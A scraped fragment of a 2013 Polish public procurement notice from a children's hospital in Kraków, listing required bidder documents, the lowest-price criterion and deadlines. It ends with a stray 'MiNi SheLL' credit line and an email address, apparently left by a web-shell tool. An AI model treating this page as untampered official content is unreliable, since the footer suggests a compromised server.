<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	wypełniony i podpisany Formularz ofertowy - zgodnie z załącznikiem nr 1A do SIWZ.
2.	wypełniony i podpisany Kosztorys ofertowy - zgodnie z załącznikiem nr 1B do SIWZ.
3.	Stosowne Pełnomocnictwo (pełnomocnictwa) do reprezentowania wykonawcy w postępowaniu albo do reprezentowania wykonawcy w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jego reprezentacji we właściwym rejestrze lub ewidencji działalności gospodarczej.
4.	Dowód wniesienia wadium.
5.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego.
6.	Wypełnione i podpisane oświadczenia oraz dokumenty wymienione w pkt 6 SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Reguluje paragraf 20 projektu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dzieciecyszpital.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Specjalistyczny Szpital Dziecięcy im. św. Ludwika w Krakowie, ul. Strzelecka 2, 31-503 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.09.2013 godzina 09:30, miejsce: Biuro Dyrekcji Wojewódzkiego Specjalistycznego Szpitala Dziecięcego im. św. Ludwika w Krakowie, ul. Strzelecka 2, 31 - 503 Kraków.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia jest finansowany ze środków przyznanych przez Województwo Małopolskie oraz środków własnych Zamawiającego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com